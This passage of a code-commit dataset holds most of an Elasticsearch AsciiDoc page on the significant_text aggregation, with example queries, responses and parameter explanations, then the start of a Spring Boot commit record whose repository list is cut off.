\"elasticsearch\":\n\n\n[source,js]\n--------------------------------------------------\n{\n ...\n \"aggregations\": {\n \"sample\": {\n \"doc_count\": 35,\n \"keywords\": {\n \"doc_count\": 35,\n \"buckets\": [\n {\n \"key\": \"elasticsearch\",\n \"doc_count\": 35,\n \"score\": 28570.428571428572,\n \"bg_count\": 35\n },\n ...\n {\n \"key\": \"currensee\",\n \"doc_count\": 8,\n \"score\": 6530.383673469388,\n \"bg_count\": 8\n },\n ...\n {\n \"key\": \"pozmantier\",\n \"doc_count\": 4,\n \"score\": 3265.191836734694,\n \"bg_count\": 4\n },\n ...\n\n}\n--------------------------------------------------\n\/\/ NOTCONSOLE\n\nThe uncleansed documents have thrown up some odd-looking terms that are, on the face of it, statistically \ncorrelated with appearances of our search term \"elasticsearch\" e.g. 
\"pozmantier\".\nWe can drill down into examples of these documents to see why pozmantier is connected using this query:\n\n[source,js]\n--------------------------------------------------\nGET news\/article\/_search\n{\n \"query\": {\n \"simple_query_string\": {\n \"query\": \"+elasticsearch +pozmantier\"\n }\n },\n \"_source\": [\n \"title\",\n \"source\"\n ],\n \"highlight\": {\n \"fields\": {\n \"content\": {}\n }\n }\n}\n--------------------------------------------------\n\/\/ CONSOLE\n\/\/ TEST[setup:news]\nThe results show a series of very similar news articles about a judging panel for a number of tech projects:\n\n[source,js]\n--------------------------------------------------\n{\n ...\n \"hits\": {\n \"hits\": [\n {\n ...\n \"_source\": {\n \"source\": \"Presentation Master\",\n \"title\": \"T.E.N. Announces Nominees for the 2015 ISE\u00ae North America Awards\"\n },\n \"highlight\": {\n \"content\": [\n \"City of San Diego Mike <em>Pozmantier<\/em>, Program Manager, Cyber Security Division, Department of\",\n \" Janus, Janus <em>ElasticSearch<\/em> Security Visualization Engine \"\n ]\n }\n },\n {\n ...\n \"_source\": {\n \"source\": \"RCL Advisors\",\n \"title\": \"T.E.N. Announces Nominees for the 2015 ISE(R) North America Awards\"\n },\n \"highlight\": {\n \"content\": [\n \"Mike <em>Pozmantier<\/em>, Program Manager, Cyber Security Division, Department of Homeland Security S&T\",\n \"Janus, Janus <em>ElasticSearch<\/em> Security Visualization Engine\"\n ]\n }\n },\n ...\n--------------------------------------------------\n\/\/ NOTCONSOLE\nMike Pozmantier was one of many judges on a panel and elasticsearch was used in one of many projects being judged.\n\nAs is typical, this lengthy press release was cut-and-paste by a variety of news sites and consequently any rare names, numbers or \ntypos they contain become statistically correlated with our matching query.\n\nFortunately similar documents tend to rank similarly so as part of examining the stream of top-matching documents the significant_text\naggregation can apply a filter to remove sequences of any 6 or more tokens that have already been seen. 
Let's try this same query now but\nwith the `filter_duplicate_text` setting turned on:\n\n[source,js]\n--------------------------------------------------\nGET news\/article\/_search\n{\n \"query\": {\n \"match\": {\n \"content\": \"elasticsearch\"\n }\n },\n \"aggs\": {\n \"sample\": {\n \"sampler\": {\n \"shard_size\": 100\n },\n \"aggs\": {\n \"keywords\": {\n \"significant_text\": {\n \"field\": \"content\",\n \"filter_duplicate_text\": true\n }\n }\n }\n }\n }\n}\n--------------------------------------------------\n\/\/ CONSOLE\n\/\/ TEST[setup:news]\n\nThe results from analysing our deduplicated text are obviously of higher quality to anyone familiar with the elastic stack:\n\n[source,js]\n--------------------------------------------------\n{\n ...\n \"aggregations\": {\n \"sample\": {\n \"doc_count\": 35,\n \"keywords\": {\n \"doc_count\": 35,\n \"buckets\": [\n {\n \"key\": \"elasticsearch\",\n \"doc_count\": 22,\n \"score\": 11288.001166180758,\n \"bg_count\": 35\n },\n {\n \"key\": \"logstash\",\n \"doc_count\": 3,\n \"score\": 1836.648979591837,\n \"bg_count\": 4\n },\n {\n \"key\": \"kibana\",\n \"doc_count\": 3,\n \"score\": 1469.3020408163263,\n \"bg_count\": 5\n }\n ]\n }\n }\n }\n}\n--------------------------------------------------\n\/\/ NOTCONSOLE\n\nMr Pozmantier and other one-off associations with elasticsearch no longer appear in the aggregation \nresults as a consequence of copy-and-paste operations or other forms of mechanical repetition. \n\nIf your duplicate or near-duplicate content is identifiable via a single-value indexed field (perhaps\na hash of the article's `title` text or an `original_press_release_url` field) then it would be more \nefficient to use a parent <<search-aggregations-bucket-diversified-sampler-aggregation,diversified sampler>> aggregation\nto eliminate these documents from the sample set based on that single key. The less duplicate content you can feed into\nthe significant_text aggregation up front the better in terms of performance.\n\n\n.How are the significance scores calculated?\n**********************************\nThe numbers returned for scores are primarily intended for ranking different suggestions sensibly rather than something easily \nunderstood by end users. The scores are derived from the doc frequencies in _foreground_ and _background_ sets. In brief, a \nterm is considered significant if there is a noticeable difference in the frequency in which a term appears in the subset and \nin the background. The way the terms are ranked can be configured, see \"Parameters\" section.\n\n**********************************\n\n.Use the _\"like this but not this\"_ pattern\n**********************************\nYou can spot mis-categorized content by first searching a structured field e.g. `category:adultMovie` and use significant_text on the\ntext \"movie_description\" field. 
Take the suggested words (I'll leave them to your imagination) and then search for all movies NOT marked as category:adultMovie but containing these keywords.\nYou now have a ranked list of badly-categorized movies that you should reclassify or at least remove from the \"familyFriendly\" category.\n\nThe significance score from each term can also provide a useful `boost` setting to sort matches.\nUsing the `minimum_should_match` setting of the `terms` query with the keywords will help control the balance of precision\/recall in the result set i.e\na high setting would have a small number of relevant results packed full of keywords and a setting of \"1\" would produce a more exhaustive results set with all documents containing _any_ keyword.\n\n**********************************\n\n\n\n==== Limitations\n\n\n===== No support for child aggregations\nThe significant_text aggregation intentionally does not support the addition of child aggregations because:\n\n* It would come with a high memory cost\n* It isn't a generally useful feature and there is a workaround for those that need it\n\nThe volume of candidate terms is generally very high and these are pruned heavily before the final\nresults are returned. Supporting child aggregations would generate additional churn and be inefficient.\nClients can always take the heavily-trimmed set of results from a `significant_text` request and \nmake a subsequent follow-up query using a `terms` aggregation with an `include` clause and child\naggregations to perform further analysis of selected keywords in a more efficient fashion.\n\n\n===== Approximate counts\nThe counts of how many documents contain a term provided in results are based on summing the samples returned from each shard and\nas such may be:\n\n* low if certain shards did not provide figures for a given term in their top sample\n* high when considering the background frequency as it may count occurrences found in deleted documents\n\nLike most design decisions, this is the basis of a trade-off in which we have chosen to provide fast performance at the cost of some (typically small) inaccuracies.\nHowever, the `size` and `shard size` settings covered in the next section provide tools to help control the accuracy levels.\n\n==== Parameters\n\n===== Significance heuristics\n\nThis aggregation supports the same scoring heuristics (JLH, mutual_information, gnd, chi_square etc) as the <<search-aggregations-bucket-significantterms-aggregation,significant terms>> aggregation\n\n\n===== Size & Shard Size\n\nThe `size` parameter can be set to define how many term buckets should be returned out of the overall terms list. By\ndefault, the node coordinating the search process will request each shard to provide its own top term buckets\nand once all shards respond, it will reduce the results to the final list that will then be returned to the client.\nIf the number of unique terms is greater than `size`, the returned list can be slightly off and not accurate\n(it could be that the term counts are slightly off and it could even be that a term that should have been in the top\nsize buckets was not returned).\n\nTo ensure better accuracy a multiple of the final `size` is used as the number of terms to request from each shard\nusing a heuristic based on the number of shards. 
To take manual control of this setting the `shard_size` parameter\ncan be used to control the volumes of candidate terms produced by each shard.\n\nLow-frequency terms can turn out to be the most interesting ones once all results are combined so the\nsignificant_terms aggregation can produce higher-quality results when the `shard_size` parameter is set to\nvalues significantly higher than the `size` setting. This ensures that a bigger volume of promising candidate terms are given\na consolidated review by the reducing node before the final selection. Obviously large candidate term lists\nwill cause extra network traffic and RAM usage so this is quality\/cost trade off that needs to be balanced. If `shard_size` is set to -1 (the default) then `shard_size` will be automatically estimated based on the number of shards and the `size` parameter.\n\n\nNOTE: `shard_size` cannot be smaller than `size` (as it doesn't make much sense). When it is, elasticsearch will\n override it and reset it to be equal to `size`.\n\n===== Minimum document count\n\nIt is possible to only return terms that match more than a configured number of hits using the `min_doc_count` option.\nThe Default value is 3.\n\nTerms that score highly will be collected on a shard level and merged with the terms collected from other shards in a second step. \nHowever, the shard does not have the information about the global term frequencies available. The decision if a term is added to a \ncandidate list depends only on the score computed on the shard using local shard frequencies, not the global frequencies of the word.\nThe `min_doc_count` criterion is only applied after merging local terms statistics of all shards. In a way the decision to add the \nterm as a candidate is made without being very _certain_ about if the term will actually reach the required `min_doc_count`. \nThis might cause many (globally) high frequent terms to be missing in the final result if low frequent but high scoring terms populated \nthe candidate lists. To avoid this, the `shard_size` parameter can be increased to allow more candidate terms on the shards. \nHowever, this increases memory consumption and network traffic.\n\n`shard_min_doc_count` parameter\n\nThe parameter `shard_min_doc_count` regulates the _certainty_ a shard has if the term should actually be added to the candidate list or \nnot with respect to the `min_doc_count`. Terms will only be considered if their local shard frequency within the set is higher than the \n`shard_min_doc_count`. If your dictionary contains many low frequent words and you are not interested in these (for example misspellings), \nthen you can set the `shard_min_doc_count` parameter to filter out candidate terms on a shard level that will with a reasonable certainty \nnot reach the required `min_doc_count` even after merging the local frequencies. `shard_min_doc_count` is set to `1` per default and has \nno effect unless you explicitly set it.\n\n\n\n\nWARNING: Setting `min_doc_count` to `1` is generally not advised as it tends to return terms that\n are typos or other bizarre curiosities. Finding more than one instance of a term helps\n reinforce that, while still rare, the term was not the result of a one-off accident. The\n default value of 3 is used to provide a minimum weight-of-evidence.\n Setting `shard_min_doc_count` too high will cause significant candidate terms to be filtered out on a shard level. 
\n This value should be set much lower than `min_doc_count\/#shards`.\n\n\n\n===== Custom background context\n\nThe default source of statistical information for background term frequencies is the entire index and this\nscope can be narrowed through the use of a `background_filter` to focus in on significant terms within a narrower\ncontext:\n\n[source,js]\n--------------------------------------------------\nGET news\/article\/_search\n{\n \"query\" : {\n \"match\" : {\n \"content\" : \"madrid\"\n }\n },\n \"aggs\" : {\n \"tags\" : {\n \"significant_text\" : {\n \"field\" : \"content\",\n \"background_filter\": {\n \"term\" : { \"content\" : \"spain\"}\n }\n }\n }\n }\n}\n--------------------------------------------------\n\/\/ CONSOLE\n\/\/ TEST[setup:news]\n\nThe above filter would help focus in on terms that were peculiar to the city of Madrid rather than revealing\nterms like \"Spanish\" that are unusual in the full index's worldwide context but commonplace in the subset of documents containing the\nword \"Spain\".\n\nWARNING: Use of background filters will slow the query as each term's postings must be filtered to determine a frequency\n\n\n===== Dealing with source and index mappings\n\nOrdinarily the indexed field name and the original JSON field being retrieved share the same name.\nHowever with more complex field mappings using features like `copy_to` the source \nJSON field(s) and the indexed field being aggregated can differ.\nIn these cases it is possible to list the JSON _source fields from which text\nwill be analyzed using the `source_fields` parameter:\n\n[source,js]\n--------------------------------------------------\nGET news\/article\/_search\n{\n \"query\" : {\n \"match\" : {\n \"custom_all\" : \"elasticsearch\"\n }\n },\n \"aggs\" : {\n \"tags\" : {\n \"significant_text\" : {\n \"field\" : \"custom_all\",\n \"source_fields\": [\"content\" , \"title\"]\n }\n }\n }\n}\n--------------------------------------------------\n\/\/ CONSOLE\n\/\/ TEST[setup:news]\n\n\n===== Filtering Values\n\nIt is possible (although rarely required) to filter the values for which buckets will be created. This can be done using the `include` and\n`exclude` parameters which are based on a regular expression string or arrays of exact terms. 
This functionality mirrors the features\ndescribed in the <<search-aggregations-bucket-terms-aggregation,terms aggregation>> documentation.\n\n\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"f34508ff8a1d85b43a0beccfc8d7377c2c993450","subject":"Remove outdated key","message":"Remove outdated key\n\nThe `spring.metrics.export.redis.aggregate-key-pattern` is no longer\ndefined but was still referenced in the documentation.\n","repos":"xialeizhou\/spring-boot,xwjxwj30abc\/spring-boot,okba1\/spring-boot,michael-simons\/spring-boot,VitDevelop\/spring-boot,Chomeh\/spring-boot,joshthornhill\/spring-boot,AngusZhu\/spring-boot,dfa1\/spring-boot,kiranbpatil\/spring-boot,allyjunio\/spring-boot,patrikbeno\/spring-boot,aahlenst\/spring-boot,shangyi0102\/spring-boot,RichardCSantana\/spring-boot,mbenson\/spring-boot,mosen11\/spring-boot,ojacquemart\/spring-boot,master-slave\/spring-boot,nghialunhaiha\/spring-boot,5zzang\/spring-boot,AstaTus\/spring-boot,pnambiarsf\/spring-boot,kamilszymanski\/spring-boot,mouadtk\/spring-boot,jxblum\/spring-boot,nebhale\/spring-boot,wwadge\/spring-boot,yunbian\/spring-boot,dreis2211\/spring-boot,liupugong\/spring-boot,master-slave\/spring-boot,ractive\/spring-boot,sbuettner\/spring-boot,srinivasan01\/spring-boot,krmcbride\/spring-boot,philwebb\/spring-boot,buobao\/spring-boot,chrylis\/spring-boot,gauravbrills\/spring-boot,SPNilsen\/spring-boot,Buzzardo\/spring-boot,playleud\/spring-boot,lokbun\/spring-boot,axelfontaine\/spring-boot,balajinsr\/spring-boot,kayelau\/spring-boot,joansmith\/spring-boot,i007422\/jenkins2-course-spring-boot,balajinsr\/spring-boot,ihoneymon\/spring-boot,end-user\/spring-boot,ollie314\/spring-boot,dreis2211\/spring-boot,chrylis\/spring-boot,Xaerxess\/spring-boot,5zzang\/spring-boot,murilobr\/spring-boot,axibase\/spring-boot,raiamber1\/spring-boot,mrumpf\/spring-boot,5zzang\/spring-boot,fulvio-m\/spring-boot,lexandro\/spring-boot,meloncocoo\/spring-boot,orangesdk\/spring-boot,ApiSecRay\/spring-boot,nandakishorm\/spring-boot,cbtpro\/spring-boot,philwebb\/spring-boot-concourse,thomasdarimont\/spring-boot,dfa1\/spring-boot,jeremiahmarks\/spring-boot,shakuzen\/spring-boot,bbrouwer\/spring-boot,panbiping\/spring-boot,DeezCashews\/spring-boot,fjlopez\/spring-boot,fjlopez\/spring-boot,kiranbpatil\/spring-boot,ralenmandao\/spring-boot,donthadineshkumar\/spring-boot,hello2009chen\/spring-boot,ralenmandao\/spring-boot,peteyan\/spring-boot,yuxiaole\/spring-boot,ractive\/spring-boot,lcardito\/spring-boot,aahlenst\/spring-boot,M3lkior\/spring-boot,PraveenkumarShethe\/spring-boot,sbuettner\/spring-boot,shangyi0102\/spring-boot,vaseemahmed01\/spring-boot,meftaul\/spring-boot,philwebb\/spring-boot,SaravananParthasarathy\/SPSDemo,rickeysu\/spring-boot,paweldolecinski\/spring-boot,jvz\/spring-boot,satheeshmb\/spring-boot,Xaerxess\/spring-boot,damoyang\/spring-boot,yuxiaole\/spring-boot,kiranbpatil\/spring-boot,thomasdarimont\/spring-boot,ameraljovic\/spring-boot,paddymahoney\/spring-boot,wwadge\/spring-boot,nghiavo\/spring-boot,nghialunhaiha\/spring-boot,zorosteven\/spring-boot,damoyang\/spring-boot,AngusZhu\/spring-boot,mosoft521\/spring-boot,peteyan\/spring-boot,simonnordberg\/spring-boot,xwjxwj30abc\/spring-boot,scottfrederick\/spring-boot,ameraljovic\/spring-boot,xdweleven\/spring-boot,nghiavo\/spring-boot,roymanish\/spring-boot,olivergierke\/spring-boot,rweisleder\/spring-boot,nelswadycki\/spring-boot,axibase\/spring-boot,eliudiaz\/spring-boot,huangyugui\/spring-boot,brettwooldridge\/spring-boot,crackien\/spring-boot,nghiavo\/s
pring-boot,mlc0202\/spring-boot,sbcoba\/spring-boot,bijukunjummen\/spring-boot,panbiping\/spring-boot,mosoft521\/spring-boot,chrylis\/spring-boot,minmay\/spring-boot,Buzzardo\/spring-boot,NetoDevel\/spring-boot,Charkui\/spring-boot,orangesdk\/spring-boot,xc145214\/spring-boot,axelfontaine\/spring-boot,durai145\/spring-boot,Xaerxess\/spring-boot,paddymahoney\/spring-boot,ralenmandao\/spring-boot,patrikbeno\/spring-boot,vpavic\/spring-boot,joshthornhill\/spring-boot,nelswadycki\/spring-boot,rizwan18\/spring-boot,minmay\/spring-boot,kamilszymanski\/spring-boot,lexandro\/spring-boot,nisuhw\/spring-boot,qq83387856\/spring-boot,npcode\/spring-boot,clarklj001\/spring-boot,srinivasan01\/spring-boot,donthadineshkumar\/spring-boot,peteyan\/spring-boot,dfa1\/spring-boot,hqrt\/jenkins2-course-spring-boot,sankin\/spring-boot,scottfrederick\/spring-boot,jayeshmuralidharan\/spring-boot,michael-simons\/spring-boot,RobertNickens\/spring-boot,zhangshuangquan\/spring-root,raiamber1\/spring-boot,DeezCashews\/spring-boot,hqrt\/jenkins2-course-spring-boot,nebhale\/spring-boot,vpavic\/spring-boot,afroje-reshma\/spring-boot-sample,mevasaroj\/jenkins2-course-spring-boot,durai145\/spring-boot,ractive\/spring-boot,cmsandiga\/spring-boot,Chomeh\/spring-boot,lexandro\/spring-boot,prakashme\/spring-boot,vaseemahmed01\/spring-boot,auvik\/spring-boot,nurkiewicz\/spring-boot,tbbost\/spring-boot,nghiavo\/spring-boot,jayarampradhan\/spring-boot,rickeysu\/spring-boot,mbenson\/spring-boot,xiaoleiPENG\/my-project,felipeg48\/spring-boot,ptahchiev\/spring-boot,RichardCSantana\/spring-boot,prakashme\/spring-boot,sbcoba\/spring-boot,tsachev\/spring-boot,lokbun\/spring-boot,imranansari\/spring-boot,keithsjohnson\/spring-boot,johnktims\/spring-boot,smayoorans\/spring-boot,lif123\/spring-boot,jrrickard\/spring-boot,jrrickard\/spring-boot,kdvolder\/spring-boot,SPNilsen\/spring-boot,jayeshmuralidharan\/spring-boot,jxblum\/spring-boot,kayelau\/spring-boot,jmnarloch\/spring-boot,isopov\/spring-boot,na-na\/spring-boot,RobertNickens\/spring-boot,ydsakyclguozi\/spring-boot,xc145214\/spring-boot,zhangshuangquan\/spring-root,lingounet\/spring-boot,lingounet\/spring-boot,fogone\/spring-boot,navarrogabriela\/spring-boot,Charkui\/spring-boot,allyjunio\/spring-boot,DeezCashews\/spring-boot,htynkn\/spring-boot,lif123\/spring-boot,RainPlanter\/spring-boot,roymanish\/spring-boot,sebastiankirsch\/spring-boot,jvz\/spring-boot,pnambiarsf\/spring-boot,jack-luj\/spring-boot,tbbost\/spring-boot,marcellodesales\/spring-boot,akmaharshi\/jenkins,linead\/spring-boot,npcode\/spring-boot,existmaster\/spring-boot,nurkiewicz\/spring-boot,sungha\/spring-boot,vakninr\/spring-boot,dnsw83\/spring-boot,xdweleven\/spring-boot,frost2014\/spring-boot,ractive\/spring-boot,lcardito\/spring-boot,fireshort\/spring-boot,paweldolecinski\/spring-boot,tsachev\/spring-boot,prasenjit-net\/spring-boot,bbrouwer\/spring-boot,duandf35\/spring-boot,meloncocoo\/spring-boot,jbovet\/spring-boot,Charkui\/spring-boot,jayeshmuralidharan\/spring-boot,tsachev\/spring-boot,jvz\/spring-boot,forestqqqq\/spring-boot,Pokbab\/spring-boot,auvik\/spring-boot,nevenc-pivotal\/spring-boot,htynkn\/spring-boot,brettwooldridge\/spring-boot,nelswadycki\/spring-boot,donhuvy\/spring-boot,tbbost\/spring-boot,sankin\/spring-boot,hehuabing\/spring-boot,Xaerxess\/spring-boot,clarklj001\/spring-boot,tiarebalbi\/spring-boot,trecloux\/spring-boot,joansmith\/spring-boot,tbadie\/spring-boot,wilkinsona\/spring-boot,lexandro\/spring-boot,yhj630520\/spring-boot,okba1\/spring-boot,SaravananParthasarathy\/SPSDemo,mdeinum\/sp
ring-boot,cbtpro\/spring-boot,AstaTus\/spring-boot,nisuhw\/spring-boot,aahlenst\/spring-boot,ihoneymon\/spring-boot,mlc0202\/spring-boot,soul2zimate\/spring-boot,playleud\/spring-boot,drumonii\/spring-boot,srikalyan\/spring-boot,RobertNickens\/spring-boot,shangyi0102\/spring-boot,drunklite\/spring-boot,dfa1\/spring-boot,mike-kukla\/spring-boot,hqrt\/jenkins2-course-spring-boot,donhuvy\/spring-boot,shangyi0102\/spring-boot,johnktims\/spring-boot,AstaTus\/spring-boot,htynkn\/spring-boot,roberthafner\/spring-boot,joansmith\/spring-boot,herau\/spring-boot,mebinjacob\/spring-boot,chrylis\/spring-boot,eddumelendez\/spring-boot,philwebb\/spring-boot,Makhlab\/spring-boot,pvorb\/spring-boot,sankin\/spring-boot,qq83387856\/spring-boot,thomasdarimont\/spring-boot,krmcbride\/spring-boot,kamilszymanski\/spring-boot,end-user\/spring-boot,jack-luj\/spring-boot,end-user\/spring-boot,akmaharshi\/jenkins,clarklj001\/spring-boot,eric-stanley\/spring-boot,jmnarloch\/spring-boot,candrews\/spring-boot,prakashme\/spring-boot,imranansari\/spring-boot,MasterRoots\/spring-boot,christian-posta\/spring-boot,dnsw83\/spring-boot,felipeg48\/spring-boot,MasterRoots\/spring-boot,mike-kukla\/spring-boot,deki\/spring-boot,Pokbab\/spring-boot,xdweleven\/spring-boot,vaseemahmed01\/spring-boot,buobao\/spring-boot,crackien\/spring-boot,mbogoevici\/spring-boot,bijukunjummen\/spring-boot,jvz\/spring-boot,hello2009chen\/spring-boot,zhangshuangquan\/spring-root,paweldolecinski\/spring-boot,mohican0607\/spring-boot,ojacquemart\/spring-boot,mackeprm\/spring-boot,pvorb\/spring-boot,kdvolder\/spring-boot,MrMitchellMoore\/spring-boot,VitDevelop\/spring-boot,jbovet\/spring-boot,keithsjohnson\/spring-boot,liupugong\/spring-boot,ameraljovic\/spring-boot,isopov\/spring-boot,philwebb\/spring-boot,sungha\/spring-boot,joansmith\/spring-boot,aahlenst\/spring-boot,deki\/spring-boot,zhanhb\/spring-boot,huangyugui\/spring-boot,candrews\/spring-boot,patrikbeno\/spring-boot,vaseemahmed01\/spring-boot,VitDevelop\/spring-boot,SPNilsen\/spring-boot,akmaharshi\/jenkins,kdvolder\/spring-boot,roymanish\/spring-boot,rickeysu\/spring-boot,RobertNickens\/spring-boot,bclozel\/spring-boot,bbrouwer\/spring-boot,xialeizhou\/spring-boot,Xaerxess\/spring-boot,keithsjohnson\/spring-boot,ApiSecRay\/spring-boot,yhj630520\/spring-boot,mohican0607\/spring-boot,axelfontaine\/spring-boot,cbtpro\/spring-boot,fulvio-m\/spring-boot,existmaster\/spring-boot,felipeg48\/spring-boot,durai145\/spring-boot,PraveenkumarShethe\/spring-boot,joshthornhill\/spring-boot,DeezCashews\/spring-boot,drunklite\/spring-boot,ilayaperumalg\/spring-boot,fogone\/spring-boot,linead\/spring-boot,liupugong\/spring-boot,xdweleven\/spring-boot,mbrukman\/spring-boot,jforge\/spring-boot,dnsw83\/spring-boot,jmnarloch\/spring-boot,mbrukman\/spring-boot,eonezhang\/spring-boot,minmay\/spring-boot,qq83387856\/spring-boot,roberthafner\/spring-boot,sankin\/spring-boot,nelswadycki\/spring-boot,qerub\/spring-boot,habuma\/spring-boot,yhj630520\/spring-boot,mouadtk\/spring-boot,duandf35\/spring-boot,sungha\/spring-boot,clarklj001\/spring-boot,MrMitchellMoore\/spring-boot,isopov\/spring-boot,kayelau\/spring-boot,izeye\/spring-boot,fireshort\/spring-boot,qq83387856\/spring-boot,nghialunhaiha\/spring-boot,prakashme\/spring-boot,jeremiahmarks\/spring-boot,orangesdk\/spring-boot,ilayaperumalg\/spring-boot,xwjxwj30abc\/spring-boot,RichardCSantana\/spring-boot,satheeshmb\/spring-boot,Buzzardo\/spring-boot,xingguang2013\/spring-boot,drunklite\/spring-boot,spring-projects\/spring-boot,sebastiankirsch\/spring-boot,olivergier
ke\/spring-boot,rmoorman\/spring-boot,mbenson\/spring-boot,allyjunio\/spring-boot,mike-kukla\/spring-boot,lingounet\/spring-boot,hklv\/spring-boot,bjornlindstrom\/spring-boot,RishikeshDarandale\/spring-boot,johnktims\/spring-boot,jmnarloch\/spring-boot,sbuettner\/spring-boot,nurkiewicz\/spring-boot,srikalyan\/spring-boot,ptahchiev\/spring-boot,nebhale\/spring-boot,linead\/spring-boot,Pokbab\/spring-boot,ChunPIG\/spring-boot,existmaster\/spring-boot,jjankar\/spring-boot,xingguang2013\/spring-boot,jrrickard\/spring-boot,simonnordberg\/spring-boot,htynkn\/spring-boot,habuma\/spring-boot,huangyugui\/spring-boot,MasterRoots\/spring-boot,yuxiaole\/spring-boot,meftaul\/spring-boot,raiamber1\/spring-boot,JiweiWong\/spring-boot,smayoorans\/spring-boot,christian-posta\/spring-boot,zorosteven\/spring-boot,spring-projects\/spring-boot,nghialunhaiha\/spring-boot,tiarebalbi\/spring-boot,cleverjava\/jenkins2-course-spring-boot,minmay\/spring-boot,MasterRoots\/spring-boot,javyzheng\/spring-boot,npcode\/spring-boot,brettwooldridge\/spring-boot,panbiping\/spring-boot,bjornlindstrom\/spring-boot,fulvio-m\/spring-boot,duandf35\/spring-boot,donhuvy\/spring-boot,jayarampradhan\/spring-boot,olivergierke\/spring-boot,nevenc-pivotal\/spring-boot,na-na\/spring-boot,neo4j-contrib\/spring-boot,eddumelendez\/spring-boot,cmsandiga\/spring-boot,chrylis\/spring-boot,damoyang\/spring-boot,eonezhang\/spring-boot,royclarkson\/spring-boot,rams2588\/spring-boot,dreis2211\/spring-boot,balajinsr\/spring-boot,mike-kukla\/spring-boot,nisuhw\/spring-boot,forestqqqq\/spring-boot,izeye\/spring-boot,paweldolecinski\/spring-boot,spring-projects\/spring-boot,rstirling\/spring-boot,NetoDevel\/spring-boot,nisuhw\/spring-boot,mabernardo\/spring-boot,bbrouwer\/spring-boot,shangyi0102\/spring-boot,gauravbrills\/spring-boot,candrews\/spring-boot,mbrukman\/spring-boot,ojacquemart\/spring-boot,rizwan18\/spring-boot,joshiste\/spring-boot,shakuzen\/spring-boot,mebinjacob\/spring-boot,spring-projects\/spring-boot,donhuvy\/spring-boot,dreis2211\/spring-boot,mbogoevici\/spring-boot,cleverjava\/jenkins2-course-spring-boot,murilobr\/spring-boot,okba1\/spring-boot,nghiavo\/spring-boot,sankin\/spring-boot,jforge\/spring-boot,nebhale\/spring-boot,RainPlanter\/spring-boot,eddumelendez\/spring-boot,lburgazzoli\/spring-boot,kamilszymanski\/spring-boot,forestqqqq\/spring-boot,mohican0607\/spring-boot,lingounet\/spring-boot,zhanhb\/spring-boot,isopov\/spring-boot,mbnshankar\/spring-boot,scottfrederick\/spring-boot,mevasaroj\/jenkins2-course-spring-boot,hehuabing\/spring-boot,tiarebalbi\/spring-boot,orangesdk\/spring-boot,candrews\/spring-boot,SaravananParthasarathy\/SPSDemo,cbtpro\/spring-boot,satheeshmb\/spring-boot,SaravananParthasarathy\/SPSDemo,rajendra-chola\/jenkins2-course-spring-boot,DeezCashews\/spring-boot,fjlopez\/spring-boot,herau\/spring-boot,neo4j-contrib\/spring-boot,mbnshankar\/spring-boot,PraveenkumarShethe\/spring-boot,designreuse\/spring-boot,Nowheresly\/spring-boot,jbovet\/spring-boot,afroje-reshma\/spring-boot-sample,ilayaperumalg\/spring-boot,RishikeshDarandale\/spring-boot,5zzang\/spring-boot,end-user\/spring-boot,sbuettner\/spring-boot,mabernardo\/spring-boot,vakninr\/spring-boot,thomasdarimont\/spring-boot,existmaster\/spring-boot,ameraljovic\/spring-boot,liupugong\/spring-boot,rajendra-chola\/jenkins2-course-spring-boot,drumonii\/spring-boot,panbiping\/spring-boot,satheeshmb\/spring-boot,ydsakyclguozi\/spring-boot,hello2009chen\/spring-boot,panbiping\/spring-boot,yuxiaole\/spring-boot,SPNilsen\/spring-boot,MrMitchellMoore\/spring-boo
t,jjankar\/spring-boot,scottfrederick\/spring-boot,RishikeshDarandale\/spring-boot,kayelau\/spring-boot,johnktims\/spring-boot,jxblum\/spring-boot,joshiste\/spring-boot,Nowheresly\/spring-boot,NetoDevel\/spring-boot,wilkinsona\/spring-boot,jbovet\/spring-boot,cmsandiga\/spring-boot,marcellodesales\/spring-boot,royclarkson\/spring-boot,xc145214\/spring-boot,ollie314\/spring-boot,eliudiaz\/spring-boot,tbadie\/spring-boot,christian-posta\/spring-boot,yunbian\/spring-boot,dfa1\/spring-boot,mrumpf\/spring-boot,raiamber1\/spring-boot,jrrickard\/spring-boot,xingguang2013\/spring-boot,balajinsr\/spring-boot,playleud\/spring-boot,wwadge\/spring-boot,aahlenst\/spring-boot,cleverjava\/jenkins2-course-spring-boot,smayoorans\/spring-boot,navarrogabriela\/spring-boot,yangdd1205\/spring-boot,M3lkior\/spring-boot,damoyang\/spring-boot,habuma\/spring-boot,rstirling\/spring-boot,herau\/spring-boot,crackien\/spring-boot,krmcbride\/spring-boot,jayeshmuralidharan\/spring-boot,tiarebalbi\/spring-boot,ollie314\/spring-boot,axibase\/spring-boot,jcastaldoFoodEssentials\/spring-boot,gauravbrills\/spring-boot,kdvolder\/spring-boot,rmoorman\/spring-boot,mouadtk\/spring-boot,habuma\/spring-boot,rizwan18\/spring-boot,bclozel\/spring-boot,cmsandiga\/spring-boot,mebinjacob\/spring-boot,ralenmandao\/spring-boot,neo4j-contrib\/spring-boot,donhuvy\/spring-boot,mosoft521\/spring-boot,yhj630520\/spring-boot,tsachev\/spring-boot,xwjxwj30abc\/spring-boot,i007422\/jenkins2-course-spring-boot,murilobr\/spring-boot,hehuabing\/spring-boot,master-slave\/spring-boot,afroje-reshma\/spring-boot-sample,chrylis\/spring-boot,lif123\/spring-boot,PraveenkumarShethe\/spring-boot,neo4j-contrib\/spring-boot,lexandro\/spring-boot,mebinjacob\/spring-boot,rickeysu\/spring-boot,hqrt\/jenkins2-course-spring-boot,MasterRoots\/spring-boot,master-slave\/spring-boot,bijukunjummen\/spring-boot,ollie314\/spring-boot,joshiste\/spring-boot,cleverjava\/jenkins2-course-spring-boot,durai145\/spring-boot,smayoorans\/spring-boot,dreis2211\/spring-boot,qerub\/spring-boot,Makhlab\/spring-boot,mosoft521\/spring-boot,i007422\/jenkins2-course-spring-boot,smilence1986\/spring-boot,bclozel\/spring-boot,designreuse\/spring-boot,lburgazzoli\/spring-boot,lokbun\/spring-boot,srinivasan01\/spring-boot,htynkn\/spring-boot,scottfrederick\/spring-boot,olivergierke\/spring-boot,xiaoleiPENG\/my-project,meloncocoo\/spring-boot,smilence1986\/spring-boot,Nowheresly\/spring-boot,murilobr\/spring-boot,soul2zimate\/spring-boot,mrumpf\/spring-boot,xwjxwj30abc\/spring-boot,Pokbab\/spring-boot,felipeg48\/spring-boot,bbrouwer\/spring-boot,crackien\/spring-boot,shakuzen\/spring-boot,liupugong\/spring-boot,xingguang2013\/spring-boot,cleverjava\/jenkins2-course-spring-b